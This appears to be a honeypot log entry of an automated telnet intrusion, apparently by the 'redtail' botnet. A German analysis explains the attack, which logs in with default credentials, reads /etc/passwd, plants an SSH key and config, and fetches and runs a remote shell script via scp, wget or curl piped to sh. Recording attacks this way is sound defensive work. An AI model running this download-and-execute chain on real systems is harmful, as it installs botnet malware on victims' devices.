30.09.2026, 08:45 UTC · 16 Befehle · über telnet · Vereinigte Staaten
user='admin' pass='admin' admin@srv01:~$ id uid=1000(admin) gid=1000(admin) groups=1000(admin) admin@srv01:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" auth_ok admin@srv01:~$ enable bash: enable: command not found admin@srv01:~$ system bash: system: command not found admin@srv01:~$ shell bash: shell: command not found admin@srv01:~$ sh admin@srv01:~$ bash admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- bash: syntax error near unexpected token `||' '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] bash: [Token]: command not found admin@srv01:~$ [Token] bash: [Token]: command not found admin@srv01:~$ [Token] bash: [Token]: command not found admin@srv01:~$ [Token] bash: [Token]: command not found admin@srv01:~$ [Token] bash: [Token]: command not found admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no bash: syntax error near unexpected token `newline' 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\… bash: syntax error near unexpected token `newline' 'rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\x6F\x6B" redtail_bot_telnet_ok
Der Angreifer meldete sich über Telnet mit Standardzugangsdaten an. Nach einer kurzen Erkundung der Systemumgebung versuchte er, eine SSH-Schlüsseldatei und eine Konfigurationsdatei im temporären Verzeichnis anzulegen. Anschließend versuchte er, ein Skript von einem externen Server herunterzuladen und auszuführen, wobei er verschiedene Methoden wie SCP, wget und curl nacheinander testete.
Die Befehle id und cat /etc/passwd dienen der Identifikation des Benutzers und der Aufzählung lokaler Konten. Der echo-Befehl schreibt einen Base64-kodierten SSH-Privatschlüssel in eine Datei namens key.ppk. Eine zweite echo-Anweisung erstellt eine SSH-Konfiguration, die die Prüfung fremder Hosts deaktiviert. Der chmod-Befehl setzt die Dateirechte auf 400, was nur dem Besitzer Lesezugriff erlaubt. Der scp-Befehl versucht, eine Datei namens out_sh vom entfernten Host zu kopieren, während wget und curl als Fallback dienen, falls SCP fehlschlägt.
Das Ziel ist die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten Gerät. Dies erkennt man am Versuch, ein externes Shell-Skript herunterzuladen und direkt auszuführen, was typisch für die Einbindung in ein Botnetz oder für Kryptomining ist.
Dieses Muster ist sehr verbreitet und stammt oft von automatisierten Botnetzen, die nach Geräten mit Standardpasswörtern suchen.